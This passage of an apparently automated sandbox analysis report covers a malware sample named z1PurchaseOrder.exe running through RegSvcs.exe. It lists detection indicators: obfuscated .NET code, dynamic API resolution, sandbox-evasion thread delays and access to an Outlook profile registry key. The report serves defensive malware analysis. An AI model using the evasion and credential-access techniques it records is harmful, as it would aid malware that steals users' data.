            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: z1PurchaseOrder.exeStatic file information: File size 1220789 > 1048576
            Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z1PurchaseOrder.exe, 00000000.00000003.1694686446.0000000004610000.00000004.00001000.00020000.00000000.sdmp, z1PurchaseOrder.exe, 00000000.00000003.1693630729.00000000047B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z1PurchaseOrder.exe, 00000000.00000003.1694686446.0000000004610000.00000004.00001000.00020000.00000000.sdmp, z1PurchaseOrder.exe, 00000000.00000003.1693630729.00000000047B0000.00000004.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: z1PurchaseOrder.exeStatic PE information: real checksum: 0xa2135 should be: 0x134caf
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040BB97 push dword ptr [ecx-75h]; iretd 1_2_0040BBA3
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'WmbQj6PNqBBjg', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'WmbQj6PNqBBjg', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'WmbQj6PNqBBjg', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004440780_2_00444078
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeAPI/Special instruction interceptor: Address: 40F5484
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598782Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598463Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598351Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597787Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596195Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596087Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599749Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598867Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598327Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597999Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1398Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8444Jump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeAPI coverage: 3.1 %
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598782Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598463Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598351Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597787Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596195Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596087Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599749Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598867Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598327Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
